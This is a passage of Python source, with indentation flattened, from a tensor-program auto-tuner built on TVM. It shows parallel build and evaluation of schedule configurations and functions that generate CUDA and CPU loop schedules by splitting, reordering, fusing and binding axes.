if os.path.exists(LIB_DIR) and os.path.isdir(LIB_DIR):
print("[Warning] Directory %s is not empty, but reusing it" % LIB_DIR)
else:
print("[Error] Fail to create directory %s\nReason: %s" % (LIB_DIR, str(e)))
exit(1)
for ep in range(math.ceil(total_configs / self.parallel)):
part_configs = new_configs[ep * self.parallel:(ep + 1) * self.parallel]
build_res_lst = []
func_name_lst = []
for config in part_configs:
func_name = "flextensor_built_function_{}_{}.tar".format(time.time(), np.random.randint(1000, 10000))
func_name_lst.append(func_name)
if mode == "op":
build_config = Config(old_configs.op_config_lst + [config], old_configs.graph_config)
op_pos = self.op_pos
elif mode == "graph":
build_config = Config(old_configs.op_config_lst, config)
op_pos = None
else:
raise RuntimeError("Unknown mode %s" % mode)
res = parallel_execute(
build_func,
self.timeout,
func_name,
self.task_key,
build_config,
op_pos,
rpc_info=self.rpc_info,
rewrite=self.rewrite
)
build_res_lst.append(res)
# time.sleep(self.timeout)
eval_res_lst = []
for i, build_res in enumerate(build_res_lst):
# print("build result get begins...")
final_res = build_res.get(timeout=self.timeout)
# print("build resutl get done.")
func_name = func_name_lst[i]
if isinstance(final_res, Exception):
msg = mode + " build fail:"
# print(final_res.__class__)
if isinstance(final_res, multi.TimeoutError):
msg = msg + "Timeout"
elif isinstance(final_res, tvm._ffi.base.TVMError):
msg = msg + " TVMError "
error_str = str(final_res)
found = False
for key_word in ["TVMError", "Error", "error", "Fail", "fail", "Invalid", "invalid"]:
if key_word in error_str:
msg = msg + error_str[error_str.index(key_word):1000]
found = True
break
if not found:
msg = msg + error_str
print(msg)
eval_res_lst.append(float("inf"))
else:
res = parallel_execute(
eval_func,
self.timeout,
func_name,
final_res[0],
final_res[1],
target,
number=number,
dev_id=self.task.dev_id,
rpc_info=self.rpc_info
)
eval_res_lst.append(res)
# time.sleep(self.timeout)
ret_lst = []
for eval_res in eval_res_lst:
if isinstance(eval_res, float):
ret_lst.append(eval_res)
else:
# print("evluate result getting...")
final_res = eval_res.get(timeout=self.timeout)
# print("evlaute result get done.")
if isinstance(final_res, Exception):
msg = mode + " run fail:"
# print(final_res.__class__)
if isinstance(final_res, multi.TimeoutError):
msg = msg + " Timeout "
elif isinstance(final_res, tvm._ffi.base.TVMError):
msg = msg + " TVMError "
error_str = str(final_res)
found = False
for key_word in ["Error", "error", "Fail", "fail", "Invalid", "invalid"]:
if key_word in error_str:
msg = msg + error_str[error_str.index(key_word):1000]
found = True
break
if not found:
msg = msg + error_str
print(msg)
ret_lst.append(float("inf"))
else:
ret_lst.append(final_res)
total_res_lst.extend(ret_lst)
for func_name in func_name_lst:
try:
os.remove(os.path.join(LIB_DIR, func_name))
except FileNotFoundError:
pass
# print("File not found when deleting")
try:
shutil.rmtree(LIB_DIR)
except Exception as e:
print(e)
# print("parallel evaluate done.")
return total_res_lst
class OpScheduler(Scheduler):
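    """Scheduler for a single operator (at position `op_pos`) of a task."""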
def __init__(self, task_key, op_pos, space, decay=0.7, parallel=1, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False, model_measurer=None, re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20):
super(OpScheduler, self).__init__("op" + str(op_pos), task_key, space, parallel, timeout, trial, number,
early_stop, rpc_info, rewrite=rewrite, re_evalutate_number=re_evalutate_number,
warm_up_epoch=warm_up_epoch, warm_up_number=warm_up_number)
self.op_pos = op_pos
self.model_measurer = model_measurer
def schedule(self, configs, method="searching", use_model=False, perf_path=None):
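        """Search a configuration for this operator with the chosen method
        ("searching", "q" or "random"), optionally using a performance model
        stored at `perf_path`.
        """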
# if hint == "split_fuse":
# wanted_types = ["spatial", "reduce", "unroll"]
# elif hint == "fuse_split":
# wanted_types = ["fuse", "reorder", "spatial", "reduce", "unroll"]
# else:
# raise RuntimeError("Unknown hint: %s" % hint)
if self.task.target == "micro":
wanted_types = ["spatial", "reduce", "intrin", "reorder"]
else:
wanted_types = ["fuse", "reorder", "spatial", "reduce", "unroll"]
if perf_path is not None:
self.walker_group.model_path = perf_path
if method == "searching":
return self._searching_schedule(configs, wanted_types, use_model=use_model)
elif method == "q":
return self._q_schedule(configs, wanted_types, use_model=use_model)
elif method == "random":
return self._random_schedule(configs, wanted_types, use_model=use_model)
else:
raise RuntimeError("Currently no support for method %s" % method)
def _parallel_evaluate(self, old_configs, new_configs, mode='op', number=1):
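        """Model-based evaluation for the "micro" target: schedule each config,
        extract its loop information and query `self.model_measurer` instead of
        compiling and running on hardware. Note that this overrides the base
        Scheduler._parallel_evaluate, so it is only valid when
        self.task.target == "micro" (enforced by the assert below).
        """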
target = self.task.target
assert target == "micro" and mode == 'op'
res_lst = []
for cfg in new_configs:
config = Config(old_configs.op_config_lst + [cfg], old_configs.graph_config)
try:
s, bufs = schedule_with_config(self.task_key, config, self.op_pos, rewrite=self.rewrite)
# stmt = tvm.lower(s, bufs, simple_mode=True)
# print(str(stmt))
info = get_iter_info(s)
l = self.model_measurer(info)
res_lst.append(l if l is not None else float("inf"))
except Exception as e:
print(e)
res_lst.append(float("inf"))
return res_lst
def parallel_evaluate(self, configs, next_op_configs, number=1, rpc_info=None):
# return self._parallel_evaluate(configs, next_op_configs, mode="op", number=number)
return self._parallel_evaluate(configs, next_op_configs, mode='op', number=number)
@staticmethod
def generate_op_schedule(target, config):
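        """Return a function (s, op, op_state) -> None that applies the splits,
        reorders, fusions, bindings and other primitives described by `config`
        to schedule `op`, specialized for the given target ("cuda", "llvm" or
        "micro").
        """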
def _cuda_schedule_split_fuse(s, op, op_state):
# assert_print(op in s)
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
local = s.cache_read(share, "local", [write_cache])
read_cache_local_lst.append(local)
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
for fuse_lst in spatial_fuse_lsts:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
# always bind here
length = len(fused_spatial_axes)
thread_extents = 1
assert_print(length > 1, "fused axes length <= 1")
if 2 <= length <= 3:
s[op].bind(fused_spatial_axes[0], tvm.thread_axis("blockIdx.x"))
s[op].bind(fused_spatial_axes[1], tvm.thread_axis("threadIdx.x"))
thread_pos = fused_spatial_axes[1]
thread_extents = spatial_fuse_extents[1]
else:
s[op].bind(fused_spatial_axes[0], tvm.thread_axis("blockIdx.x"))
s[op].bind(fused_spatial_axes[1], tvm.thread_axis("vthread"))
s[op].bind(fused_spatial_axes[2], tvm.thread_axis("threadIdx.x"))
thread_pos = fused_spatial_axes[2]
thread_extents = spatial_fuse_extents[2]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
for count in range(length):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# change the order of reduce axes and spatial axes
reorder_lst.extend(s[write_cache].op.axis)
s[write_cache].reorder(*reorder_lst)
if length == 1:
share_pos = reduced_nonfuse_lsts[-1][0]
else:
share_pos = reduced_nonfuse_lsts[-2][0]
local_pos = reduced_nonfuse_lsts[-1][-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
if local_pos is not None:
for local in read_cache_local_lst:
s[local].compute_at(s[write_cache], local_pos)
else:
for local in read_cache_local_lst:
s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
outer, inner = s[share].split(fused, nparts=thread_extents)
s[share].bind(outer, tvm.thread_axis("threadIdx.x"))
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cuda_schedule_fuse_split(s, op, op_state):
# assert_print(op in s)
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
# read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
# local = s.cache_read(share, "local", [write_cache])
# read_cache_local_lst.append(local)
# spatial fuse
spatial_axes = s[op].op.axis
fused_spatial_axes = []
if "fuse" in config and len(config["fuse"]) > 0:
# fuse redundant axes
beg = 0
for end in config["fuse"][0]:
fuse_lst = spatial_axes[beg:end]
beg = end
if len(fuse_lst) > 0:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
else:
fused_spatial_axes = spatial_axes
# spatial split
split_factor_lst = []
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
# compute split factors
if "fuse" in config and len(config["fuse"]) > 0:
beg = 0
for end in config["fuse"][0]:
tmp_lst = [1] * len(config["spatial"][0])
for i in range(beg, end):
for j in range(len(config["spatial"][i])):
tmp_lst[j] *= config["spatial"][i][j]
if beg < end:
split_factor_lst.append(tmp_lst)
beg = end
else:
split_factor_lst = config["spatial"]
assert len(fused_spatial_axes) == len(split_factor_lst), "align failed"
for axis, nparts in zip(fused_spatial_axes, split_factor_lst):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in fused_spatial_axes:
splited_spatial_axes.append([axis])
assert len(splited_spatial_axes) > 0, "empty spatial axes" # must be non-empty
# always reorder here
reorder_lst = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
# fix kernel scope
kernel_scope = reorder_lst[0]
# always bind here
# - prepare thread axis
bx = tvm.thread_axis("blockIdx.x")
by = tvm.thread_axis("blockIdx.y")
bz = tvm.thread_axis("blockIdx.z")
vx = tvm.thread_axis("vthread")
vy = tvm.thread_axis("vthread")
vz = tvm.thread_axis("vthread")
tx = tvm.thread_axis("threadIdx.x")
ty = tvm.thread_axis("threadIdx.y")
tz = tvm.thread_axis("threadIdx.z")
blocks = [bz, by, bx]
threads = [tz, ty, tx]
vthreads = [vz, vy, vx]
block_extents = [-1, -1, -1] # z, y, x
virtual_extents = [-1, -1, -1]
thread_extents = [-1, -1, -1]
length = len(splited_spatial_axes)
assert length >= 1
# - bind
count = min(length, len(blocks)) - 1
while count >= 0:
parts = len(splited_spatial_axes[count])
assert parts > 0
if parts == 1:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
elif parts == 2:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
s[op].bind(splited_spatial_axes[count][1], threads[count])
thread_extents[count] = split_factor_lst[count][1]
else:
s[op].bind(splited_spatial_axes[count][0], blocks[count])
block_extents[count] = split_factor_lst[count][0]
s[op].bind(splited_spatial_axes[count][1], vthreads[count])
virtual_extents[count] = split_factor_lst[count][1]
s[op].bind(splited_spatial_axes[count][2], threads[count])
thread_extents[count] = split_factor_lst[count][2]
count -= 1
# - compute at pos
count = min(length, len(blocks)) - 1
parts = len(splited_spatial_axes[count])
thread_pos = splited_spatial_axes[count][min(parts - 1, 2)]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
# local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# decide where to compute at
if length == 1:
share_pos = last_part[-1]
else:
mid = math.ceil(length / 2.0) - 1
share_pos = reduced_nonfuse_lsts[mid][-1]
# local_pos = last_part[-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
# if local_pos is not None:
# for local in read_cache_local_lst:
# s[local].compute_at(s[write_cache], local_pos)
# else:
# for local in read_cache_local_lst:
# s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
count = 2
cur = 1
limit = 1024
while count >= 0:
factor = thread_extents[count]
if factor < 0:
defined = False
factor = 16
else:
defined = True
cur *= factor
if not defined and cur > limit:
break
fused, inner = s[share].split(fused, factor=factor)
s[share].bind(inner, threads[count])
count -= 1
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cuda_schedule_split_reorder_fuse(s, op, op_state):
# assert_print(op in s)
loop_lst = []
loop_idx = []
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# always cache read here
read_cache_share_lst = []
# read_cache_local_lst = []
for t in op.input_tensors:
share = s.cache_read(t, "shared", [write_cache])
read_cache_share_lst.append(share)
# local = s.cache_read(share, "local", [write_cache])
# read_cache_local_lst.append(local)
# spatial split
spatial_axes = [axis for axis in s[op].op.axis]
assert len(spatial_axes) > 0, "empty spatial axes" # must be non-empty
n = spatial_axes[0]
kernel_scope, n = s[op].split(n, nparts=1)
spatial_axes[0] = n
splited_spatial_axes = []
splited_spatial_extents = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
tmp_extents = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_extents.append(nparts[count])
tmp_buffer.append(axis)
tmp_extents.append(nparts[-1])
splited_spatial_axes.append(tmp_buffer)
splited_spatial_extents.append(tmp_extents)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
splited_spatial_extents.append([axis.dom.extent.value])
# always reorder here
reorder_lst = []
reorder_parts = []
reorder_part_extents = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extents = [x[count] for x in splited_spatial_extents]
reorder_lst.extend(tmp_buffer)
reorder_parts.append(tmp_buffer)
reorder_part_extents.append(tmp_extents)
s[op].reorder(*reorder_lst)
# handle fuse request
fused_parts = []
fused_part_extents = []
fused_part_idx = []
if "fuse" in config and len(config["fuse"]) > 0:
base_id = 0
for part, extents in zip(reorder_parts, reorder_part_extents):
tmp_part = []
tmp_extents = []
tmp_idx = []
idx = 0
beg = 0
for end in config["fuse"][0]:
if end - beg > 1:
fuse_lst = part[beg:end]
fused = s[op].fuse(*fuse_lst)
tmp_part.append(fused)
extent = reduce(lambda x, y: x * y, extents[beg:end], 1)
tmp_idx.extend([idx] * (end - beg))
idx += 1
tmp_extents.append(extent)
elif end - beg == 1:
tmp_part.append(part[beg])
tmp_extents.append(extents[beg])
tmp_idx.append(idx)
idx += 1
beg = end
fused_parts.append(tmp_part)
fused_part_extents.append(tmp_extents)
fused_part_idx.append(tmp_idx)
loop_lst.extend(tmp_part)
loop_idx.extend([x + base_id for x in tmp_idx])
base_id += len(tmp_part)
else:
fused_parts = reorder_parts
fused_part_extents = reorder_part_extents
fused_part_idx = [list(range(len(x))) for x in reorder_parts]
loop_lst = reorder_lst
loop_idx = list(range(len(reorder_lst)))
# record op state
op_state.loop_lst = loop_lst
op_state.loop_idx = loop_idx
# always bind here
# - prepare thread axis
bx = tvm.thread_axis("blockIdx.x")
by = tvm.thread_axis("blockIdx.y")
bz = tvm.thread_axis("blockIdx.z")
vx = tvm.thread_axis("vthread")
vy = tvm.thread_axis("vthread")
vz = tvm.thread_axis("vthread")
tx = tvm.thread_axis("threadIdx.x")
ty = tvm.thread_axis("threadIdx.y")
tz = tvm.thread_axis("threadIdx.z")
blocks = [bz, by, bx]
threads = [tz, ty, tx]
vthreads = [vz, vy, vx]
block_extents = [-1, -1, -1] # z, y, x
virtual_extents = [-1, -1, -1]
thread_extents = [-1, -1, -1]
bind_option = [None, None, None]
bind_candidate = [blocks, vthreads, threads]
candiate_extents = [block_extents, virtual_extents, thread_extents]
# - bind
num_parts = len(fused_parts)
if num_parts == 1:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
local_pos = fused_parts[0][:len(bind_candidate[0])][-1]
elif num_parts == 2:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
bind_option[2] = (fused_parts[1], fused_part_extents[1])
local_pos = fused_parts[1][:len(bind_candidate[2])][-1]
else:
bind_option[0] = (fused_parts[0], fused_part_extents[0])
bind_option[1] = (fused_parts[1], fused_part_extents[1])
bind_option[2] = (fused_parts[2], fused_part_extents[2])
local_pos = fused_parts[2][:len(bind_candidate[2])][-1]
for option, candidate, extents in zip(bind_option, bind_candidate, candiate_extents):
if option is not None:
for i, axis in enumerate(option[0][:len(candidate)]):
s[op].bind(axis, candidate[i])
extents[i] = option[1][i]
# compute at
if "local_pos" in config and len(config["local_pos"]) > 0:
local_at_part = config["local_pos"][0][0]
local_at_idx = config["local_pos"][0][1]
# index changed because of fusion
cur_idx = fused_part_idx[local_at_part][local_at_idx]
local_pos = fused_parts[local_at_part][cur_idx]
# always compute at here
s[write_cache].compute_at(s[op], local_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
share_pos = None
# local_pos = None
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
# leave the last part
for count in range(length - 1):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# the last part
last_part = [x[length - 1] for x in splited_reduced_axes]
spatial_remainder = s[write_cache].op.axis
# change the order of reduce axes and spatial axes
if "reorder" in config and len(config["reorder"]) > 0:
pos = config["reorder"][0][0]
assert pos < len(spatial_remainder)
tmp_buffer = []
count = len(spatial_remainder) - 1
while count > pos:
tmp_buffer.append(spatial_remainder[count])
count -= 1
p = pos
q = len(last_part) - 1
while p >= 0 and q >= 0:
tmp_buffer.append(spatial_remainder[p])
tmp_buffer.append(last_part[q])
p -= 1
q -= 1
while p >= 0:
tmp_buffer.append(spatial_remainder[p])
p -= 1
while q >= 0:
tmp_buffer.append(last_part[q])
q -= 1
tmp_buffer = list(reversed(tmp_buffer))
reorder_lst.extend(tmp_buffer)
else:
reorder_lst.extend(last_part)
reorder_lst.extend(spatial_remainder)
s[write_cache].reorder(*reorder_lst)
# decide where to compute at
if "share_pos" in config and len(config["share_pos"]) > 0:
share_at = config["share_pos"][0][0]
share_idx = config["share_pos"][0][1]
reduced_nonfuse_lsts.append(last_part)
share_pos = reduced_nonfuse_lsts[share_at][share_idx]
else:
if length == 1:
share_pos = last_part[-1]
else:
mid = math.ceil(length / 2.0) - 1
share_pos = reduced_nonfuse_lsts[mid][-1]
# local_pos = last_part[-1]
# always cache read here
if share_pos is not None:
for share in read_cache_share_lst:
s[share].compute_at(s[write_cache], share_pos)
else:
for share in read_cache_share_lst:
s[share].compute_inline()
# if local_pos is not None:
# for local in read_cache_local_lst:
# s[local].compute_at(s[write_cache], local_pos)
# else:
# for local in read_cache_local_lst:
# s[local].compute_inline()
# always cooperative fetching
if share_pos is not None:
for share in read_cache_share_lst:
fuse_lst = s[share].op.axis
fused = s[share].fuse(*fuse_lst)
count = 2
cur = 1
limit = 1024
while count >= 0:
factor = thread_extents[count]
if factor < 0:
defined = False
factor = 16
else:
defined = True
cur *= factor
if not defined and cur > limit:
break
fused, inner = s[share].split(fused, factor=factor)
s[share].bind(inner, threads[count])
count -= 1
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
explicit = config["unroll"][0][1]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
s[op].pragma(kernel_scope, 'unroll_explicit', explicit)
def _cpu_schedule_split_fuse(s, op, op_state):
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "global")
# spatial split
spatial_axes = s[op].op.axis
splited_spatial_axes = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# always reorder and fuse here
spatial_fuse_lsts = []
spatial_fuse_extents = []
reorder_lst = []
fused_spatial_axes = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extent = reduce(lambda a, b: a * b, [x[count] for x in config["spatial"]])
spatial_fuse_lsts.append(tmp_buffer)
spatial_fuse_extents.append(tmp_extent)
reorder_lst.extend(tmp_buffer)
s[op].reorder(*reorder_lst)
for fuse_lst in spatial_fuse_lsts:
fused = s[op].fuse(*fuse_lst)
fused_spatial_axes.append(fused)
kernel_scope = fused_spatial_axes[0]
# always parallel here
length = len(fused_spatial_axes)
assert_print(length > 0, "empty spatial axes!")
s[op].parallel(fused_spatial_axes[0])
if length == 1:
thread_pos = fused_spatial_axes[0]
            elif 2 <= length <= 3:
thread_pos = fused_spatial_axes[1]
else:
thread_pos = fused_spatial_axes[2]
# always compute at here
s[write_cache].compute_at(s[op], thread_pos)
# reduce_split
reduced_axes = s[write_cache].op.reduce_axis
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
tmp_buffer = []
for count in range(len(nparts) - 1):
outer, axis = s[write_cache].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# if has reduce axes
if len(splited_reduced_axes) > 0:
# always reorder here
reduced_nonfuse_lsts = []
reorder_lst = []
length = len(splited_reduced_axes[0])
for count in range(length):
tmp_buffer = [x[count] for x in splited_reduced_axes]
reduced_nonfuse_lsts.append(tmp_buffer)
reorder_lst.extend(tmp_buffer)
# change the order of reduce axes and spatial axes
rlength = len(splited_reduced_axes)
if rlength > 1:
reorder_lst.extend(s[write_cache].op.axis)
elif rlength == 1: # in this case, have to interleave otherwise the reorder is of no use
tmp_order = []
p_spatial = len(s[write_cache].op.axis) - 1
p_reduce = len(reorder_lst) - 1
while p_spatial >= 0 and p_reduce >= 0:
tmp_order.append(s[write_cache].op.axis[p_spatial])
tmp_order.append(reorder_lst[p_reduce])
p_spatial -= 1
p_reduce -= 1
while p_spatial >= 0:
tmp_order.append(s[write_cache].op.axis[p_spatial])
p_spatial -= 1
while p_reduce >= 0:
tmp_order.append(reorder_lst[p_reduce])
p_reduce -= 1
tmp_order = list(reversed(tmp_order))
reorder_lst = tmp_order
s[write_cache].reorder(*reorder_lst)
# unroll
if "unroll" in config and len(config["unroll"]) > 0:
step = config["unroll"][0][0]
s[op].pragma(kernel_scope, 'auto_unroll_max_step', step)
# always vectorize here
s[write_cache].vectorize(s[write_cache].op.axis[-1])
def _cpu_schedule_split_reorder_fuse(s, op, op_state):
# assert_print(op in s)
loop_idx = []
loop_lst = []
# always cache write here
# if op.num_outputs > 1:
# raise RuntimeWarning("Too many outputs in one operation!")
write_cache = s.cache_write(op.output(0), "local")
# spatial split
spatial_axes = [axis for axis in s[op].op.axis]
assert len(spatial_axes) > 0, "empty spatial axes" # must be non-empty
n = spatial_axes[0]
kernel_scope, n = s[op].split(n, nparts=1)
spatial_axes[0] = n
splited_spatial_axes = []
splited_spatial_extents = []
if "spatial" in config and len(config["spatial"]) > 0:
# to align each axis
assert len(config["spatial"]) == len(spatial_axes), "align failed"
for axis, nparts in zip(spatial_axes, config["spatial"]):
tmp_buffer = []
tmp_extents = []
for count in range(len(nparts) - 1):
outer, axis = s[op].split(axis, nparts=nparts[count])
tmp_buffer.append(outer)
tmp_extents.append(nparts[count])
tmp_buffer.append(axis)
tmp_extents.append(nparts[-1])
splited_spatial_axes.append(tmp_buffer)
splited_spatial_extents.append(tmp_extents)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
splited_spatial_extents.append([axis.dom.extent.value])
# always reorder here
reorder_lst = []
reorder_parts = []
reorder_part_extents = []
for count in range(len(splited_spatial_axes[0])):
tmp_buffer = [x[count] for x in splited_spatial_axes]
tmp_extents = [x[count] for x in splited_spatial_extents]
reorder_lst.extend(tmp_buffer)
reorder_parts.append(tmp_buffer)
reorder_part_extents.append(tmp_extents)
s[op].reorder(*reorder_lst)
# handle fuse request
fused_parts = []
fused_part_extents = []
fused_part_idx = []
if "fuse" in config and len(config["fuse"]) > 0:
base_id = 0
for part, extents in zip(reorder_parts, reorder_part_extents):
tmp_part = []
tmp_extents = []
tmp_idx = []
idx = 0
beg = 0
for end in config["fuse"][0]:
if end - beg > 1:
fuse_lst = part[beg:end]
fused = s[op].fuse(*fuse_lst)
tmp_part.append(fused)
extent = reduce(lambda x, y: x * y, extents[beg:end], 1)
tmp_idx.extend([idx] * (end - beg))
idx += 1
tmp_extents.append(extent)
elif end - beg == 1:
tmp_part.append(part[beg])
tmp_extents.append(extents[beg])
tmp_idx.append(idx)
idx += 1
